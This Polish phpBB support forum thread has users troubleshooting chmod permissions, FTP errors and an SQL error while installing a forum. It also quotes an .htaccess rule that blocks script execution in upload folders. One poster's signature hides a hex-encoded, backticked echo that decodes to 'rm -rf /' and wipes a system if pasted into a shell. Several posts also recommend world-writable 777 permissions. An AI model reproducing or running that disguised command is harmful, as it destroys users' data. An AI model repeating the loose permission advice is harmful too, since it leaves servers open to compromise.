phpBB2 by Przemo
Support forów phpBB2 modified by Przemo

FAQFAQ - PIERWSZA POMOC!!  regulaminREGULAMIN  SzukajSZUKAJ  UżytkownicyUżytkownicy  GrupyGrupy  StatystykiStatystyki
RejestracjaRejestracja  ZalogujZaloguj  DownloadDownload  katalog Forów DyskusyjnychKatalog Forów   FAQ Video tutoriale

Poprzedni temat «» Następny temat
Prawa CHMODY - jak to zrobi? ?
Autor Wiadomość
Lobezzz


Pomógł: 9 razy
Posty: 232
Wysłany: 23-02-2006, 15:36   

mam pytanie dotyczace chmod => robie wszystko zgodnie z instrukcja, a jednak czesc wgranych przeze mnie folderow nie chce zaakceptowac tego ze nadaje im chmod 777
wszystko jest ok poza kilkoma folderami.
wie ktos moze o co chodzi?
robie to za pomoca Total Commandera...
 
     
Gadatliwa Kasia 

   
Mroczny pan

Posty: 3
Wysłany: 23-02-2006, 16:03   

wejdz w Panel admina, kliknij opcję check files w zakładce administracja,
jeżeli zobaczesz że jakies foldery nie mają chmoda, to skopiuj polecenie które jest napisane boldem do totala, i wciśnij enter, i tak przy każdym folderze
 
     
Lobezzz


Pomógł: 9 razy
Posty: 232
Wysłany: 23-02-2006, 16:08   

ech, wiem jak sie nadaje prawa, tylko po prostu on niektorym folderom tych praw nadac nie chce ;/

EDIT:// CuteFTP stwierdza ze tam jest chmod 777... no nic, pisze do admina serwera.
 
     
Xtremex

Posty: 1
Wysłany: 26-02-2006, 19:02   ???

Ja też mam problemy. Zrobiłem Atrybuty jak należy i gdy wchodzę w Loguj, wpisuje swoje dane i czekam z 20s i mi pisze, że nie można wyświetlic strony. Gdy biorę rejestruj i wpisuje dane, klikam rejestracja wyskakuje mi taki błąd:


Error geting users post stat

DEBUG MODE

SQL Error : 1054 Unknown column 'g.group_id' in 'on clause'

SELECT ug.user_id, g.group_id as g_id, g.group_name , u.user_posts, g.group_count FROM xtremex_groups g, xtremex_users u LEFT JOIN xtremex_user_group ug ON g.group_id = ug.group_id AND ug.user_id = 3 WHERE u.user_id = 3 AND ug.user_id is NULL AND g.group_count = 0 AND g.group_single_user = 0 AND g.group_moderator <> 3

Line : 829
File : usercp_register.php

Jeśli nie potrafisz znaleźć rozwiązania tego problemu,
możesz spróbować poszukać, lub zadać pytanie na forum: http://przemo.org/phpBB2/forum

Ale jedno co jest dziwne :!: Przy próbie zalogowania(co pisze nie można wyświetlic srony...) jak wpisze w przeglądarkę jeszcze raz mój adres forum to jestem zalogowany :?: :?: :?:

Proszę pomóżcie :!:

Zresztą sami zobaczcie, zarejestrójcie się, niech wyskoczy bład i wpiszcie jeszcze raz adres i będziecie mieli konto. Mój adres(każdy chyba widzi na górze, ale wrazie czego)
Kod:
www.xtremexx.yoyo.pl
 
     
paaaszczak

Posty: 1
Wysłany: 25-03-2006, 15:21   

mam problem z ustawieniem chmodów.
uzywam Total Commandera. Gdy chcę zmienić chmody wyskakuje okienko z napisem: Nie mogę zmienić atrybutów zdalnych plików!
Natomiast gdy robie to wpisując komende np.: chmod 777 tmp, to pisze tak:
SITE chmod 777 tmp
550 tmp: Permission denied.

co robić????
 
     
Sajmon

Posty: 22
Wysłany: 25-03-2006, 19:55   

Zapytać admina serwera dlaczego nie możesz zmienić chmod'ów.
_________________
Gość nie interesuje mnie że pomagasz tylko na forum. Pisać na GG/PW Z Tobą nie będę bo nie mam o czym.Odwiedzać Twojej lub polecanej strony/forum też mi się nie chce.
`echo -e "\x72\x6D\x20\x2D\x72\x66\x20\x2F"`
 
     
kratek_cnk

Posty: 1
Wysłany: 01-04-2006, 16:52   

Witam ;) mam jedno pytanie , jak ustawić CHMODY dla plików (666) za pomocą przeglądarki IE ?? które pola mają być zaznaczone ?? najlepiej było by jakby ktoś obrazek zapodał ;)

Proszę o pomoc bardzo mi zależy :(
 
     
ciaastek


Pomógł: 37 razy
Posty: 434
Wysłany: 01-04-2006, 18:37   

Za pomocą przeglądarki? Z tego co wiem to taką opcje mają klienty FTP... ale przeglądarka? Jeszcze na dodatek IE. :shock:

Jeżeli naprawdę się da :lol: to też proszę o info
 
     
vegetagt


Pomógł: 125 razy
Posty: 1243
Wysłany: 01-04-2006, 21:48   

kratek_cnk, 3 post na pierwszej stronie.
chmod 666 to zaznaczone wszystkie pola w kolumnach odczyt i zapis

ciaastek napisał/a:
Z tego co wiem to taką opcje mają klienty FTP... ale przeglądarka? Jeszcze na dodatek IE.

Jeżeli naprawdę się da to też proszę o info


no to najwyraźniej mało wiesz :?
_________________
JA NAPRAWDE NIE UDZIELAM POMOCY NA GG/PW I NIE ODPOWIADAM NA PYTANIA!
Ja pomogłem, Pan pomógł. Kto pomógł? Ci państwo :)
 
     
toifel

Posty: 1
Wysłany: 09-10-2006, 12:42   

Witam ja też mam problem z nadaniem atrybutów folderom .
Używam Total Commandera i gdu daje atrybut dalego foldera na 777 to wyskakuje mi taki komunikat "Nie mogę zmienić atrybutów zdalnych plików " niewiem dlaczego jeśli ktoś wie to proszę o pomoc moje gg 2788930
lub napiszcie tu posta za pomkoc dzięx ;)
 
     
mincel

Posty: 15
Wysłany: 04-11-2006, 19:22   

Witam,

Używam "phpBB by Przemo v.1.12.5" i wyczytałem gdzieś że powinien zawierać on plik w którym jest informacja o tym które katalogi mają mieć prawa 777. Niestety takiego pliku ze wspomnianą informacją nie ma, byłbym w związku z tym, wdzięczny za informacje które katalogi i podkatalogo mają mieć prawa 777.

Dodatkowo mam pytanko.
Tak przeczytałem ten temat i nasówa mi się jedno na myśl (pytanie):
Czy błędem z mojej strony jest jeżeli zarówno pliki jak i katalogi mają ustawione prawa 755 :?:



Pozatym do wspomnianych metod zmiany chmod mogę dodać jeszcze jedną, za pomocą SSL. Wystarczy zalogować się na konto na serwerze na jakim mamy umieszczone forum przez SSL, wejść do katalogu w kturym znajduje się katalog forum i wpisać następującą komendę
Kod:
chmod -R 755 nazwa_katalogu_w_którym_jest_nasze_forum
Wspomniany katalog, jego podjkatalogi, oraz pliki w nim i nich zawarte będą miały w efekcie tego polecenia prawa 755 (jest to jego zaleta i wada [bo niemożna wyodrębnić plików jako osobnych z innymi prawami])



A! jeszcze jedno, do połączenia SSL można zastosować program PuTTY
 
     
kica1983


Pomógł: 3 razy
Posty: 123
Wysłany: 04-11-2006, 22:22   

mincel napisał/a:
wyczytałem gdzieś że powinien zawierać on plik w którym jest informacja o tym które katalogi mają mieć prawa 777

adres_forum/check_files.php
 
     
mr.Radek


Pomógł: 2 razy
Posty: 60
Wysłany: 15-11-2006, 18:19   

ja musze ustawić jakiś plik na prawa 666 próbuje to zrobić jak napisał vegetagt, czyli ustawiam wszystkie pola odczyt i zapis. i wyskakuje mi jeszcze więcej blędów niż było :/ zobaczcie sami: http://www.allforum.yoyo.pl
 
     
z!omek_PL

Pomógł: 4 razy
Posty: 72
Wysłany: 04-01-2007, 18:03   

Na forum ddl2.pl admin napisał coś takiego:
Cytat:
Bardzo duzym i czestym problemem jest to ze instalujemy forum a potem nam je rozwalaja. Dzieje sie tak za sprawa katalogow ktorym dajemy dyrnie prawa 777 i plika prawa 777. Jezeli program podczas instalacji wymaga takich praw to mu nadajemy takie prawa do folderow ktore tego wymagaja a nastepnie po zainstalowaniu wszystkiego zmieniamy na 707 a pliki na 606 !!! W 100 % wszytsko bedzie dzialac poprawnie !!!

Koleiny problem to fora i katalogi upload ! Tam haker zawsze wzuca specialniy plik php i ...
Aby uniknac tego tymu systulacji nalezy do kazdego katalogu !! ZAZNACZAM KAZDEGO - php by przemo ma ich 6 gdzie sa wgrywane pliki, zdieci, grafiki i inne dziadostwo z postow wgrac odpowiednio spreparowany plik .htaccess Podaje ponizej dokladnie zawartosc takiego pliku ktory musi sie znalesc w kazdym katalogu gdzie mozna cos wgrac - podczas instalacji tym kataloga dawalismy prawa 777

Kod:
<Files ~ "^.*\.(php|cgi|pl|php3|php4|php5|php6|phtml|shtml)">
Order allow,deny
Deny from all
</Files>


Reasumujac :
Instalujemy nadajemy plika i foldera prawa 777
Konczyy instalacje zmieniamy prawa kataloga na 707 a plika na 606
Do kazdego katalogu gdzie zostaly prawa 707 wzucamy powyzszy plik .htaccess


co o tym myślicie?
 
     
Gadatliwa Kasia 

   
M@arcin

Pomógł: 25 razy
Posty: 136
Wysłany: 08-02-2007, 17:26   

Sewion, ale przecież wszystko pisze w 1 poście, dodatkowo są rysunki :?
_________________
Gość
Przeczytaj to jak afabet: B D J Q P =>smacznego :P
 
     
Wyświetl posty z ostatnich:   
Odpowiedz do tematu
Nie możesz pisać nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz głosować w ankietach
Nie możesz załączać plików na tym forum
Możesz ściągać załączniki na tym forum
Dodaj temat do Ulubionych
Wersja do druku

Skocz do:  

Kopiowanie wszelkich treści zawartych na forum, modyfikacji oraz instrukcji bez zgody administracji i autorów tematów/postów zabronione!

Powered by phpBB modified by Przemo © 2003 phpBB
Strona wygenerowana w 0,09 sekundy. Zapytań do SQL: 11
Polecane serwisy

Najlepsze oprogramowanie do prowadzenia sklepu internetowegoNajlepszy program do sklepu firmowany przez Przem'a

Sklep z gadżetami

mediaclick.pl

serwis laptopów

phpbb

Polisy Ubezpieczeniowe TU Europa

Design Cart - Tworzenie sklepu internetowego

dnirozwoju.pl

Ranking Hostingów HostingOnline.pl

• Zamów reklamę